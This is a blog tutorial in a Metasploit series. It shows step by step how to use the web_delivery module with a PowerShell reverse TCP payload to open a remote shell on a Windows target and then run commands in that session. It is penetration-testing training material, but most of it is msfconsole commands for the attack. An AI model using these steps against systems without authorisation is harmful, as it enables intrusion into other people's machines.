top of page
Search
  • OTW

Metasploit Basics, Part 19: Web Delivery for Windows

Updated: Dec 31, 2022


Welcome back, my Metasploit aficianodos!

In the previous part of this series, we looked at how to use Metasploit's web delivery exploit to create a script to connect to a UNIX, Linux, or OS X machine using Python. Many members of the Hackers-Arise community have asked me, "Can we do the same for a Windows systems?" The answer is YES!

Although the web delivery exploit will work on Windows systems that have Python installed, few Windows systems actually have Python installed. On the other hand, nearly ever UNIX, Linux, and OS X have Python installed by default. Fortunately, those Windows systems do have PowerShell installed by default, and we can use it with Metasploit's web delivery exploit to take control of those systems.

In this tutorial, we will use Metasploit's web delivery exploit to take control of a Windows system through its PowerShell.

Step 1: Start Metasploit

To begin, fire up your Kali system, open a terminal, and start Metasploit.

kali > msfconsole

Step 2: Loading the Web Delivery Exploit

As mentioned above, using Metasploit's web delivery is very similar to web delivery on Unix, Linux, and OS X systems except that Windows systems don't have Python installed by default. As a result, we will need to use Windows PowerShell, and there is a web delivery module specially for Powershell.

Let's load the web delivery exploit in Metasploit;

msf > use exploit/multi/script/web_delivery

Next, we need to set the LHOST and LPORT exactly like we did with the Unix/Linux/OS X web delivery exploit.

msf > set LHOST 192.168.1.153

msf > set LPORT 4444

Then we need to set the URIPATH. This sets the URI that the web server will host and the Powershell command will connect back to. This can be set to anything you please. I set it here to "powersploit", but you can set it to anything you like.

msf > set URIPATH powersploit

Step 3: Set the Target to PowerShell

By default, the web delivery exploit in Metasploit uses Python scripts. To use the Windows-based PowerShell option, we need to set the target to 2.

msf > set target 2

With the target set to 2, Metasploit will create a PowerShell script rather than a Python script when we are ready to exploit.

Step 4: Set the Payload

Lastly, we need to set the payload. Let's use the windows/powershell_reverse_tcp payload.

msf > set payload windows/powershell_reverse_tcp

Before we start the exploit, let's checks the options to see whether we have all of them set properly.

msf > show options

Now, we can type exploit and Metasploit will start a small web server in the background and generate a command for us to use on the Windows target system.

msf > exploit

Next, open a command prompt on the target Windows system and run that command that Metasploit generated like below.

When you hit enter, that command will open a connection to the attack machine.

Now, on the attack system, we can check to see whether the session has opened by entering:

msf > sessions -l

As you can see above, we have a session opened with an ID of 1. We can use that session by typing:

msf > sessions -i 1

Where 1 is the ID of the session. If your session ID is different, such as 2, 3, etc., you should use that ID in the command above such as "sessions -i 2".

Now we have a session on the Windows machine. Success! We now own that system!

We can now check to see the running processes on the target system by entering:

PS C: \Users\OTW > Get-Process

Now, that we are connected to the Windows machine's PowerShell, we can run any of the PowerShell "command-lets" as well as the most common Linux commands (ls, ps, cd, grep, cat, pwd, etc.).

If you want to hone your Metasploit skills and become a Metasploit Expert, attend the upcoming Metasploit Kung-Fu course.


2,295 views1 comment
600x200_edited_edited.jpg
bottom of page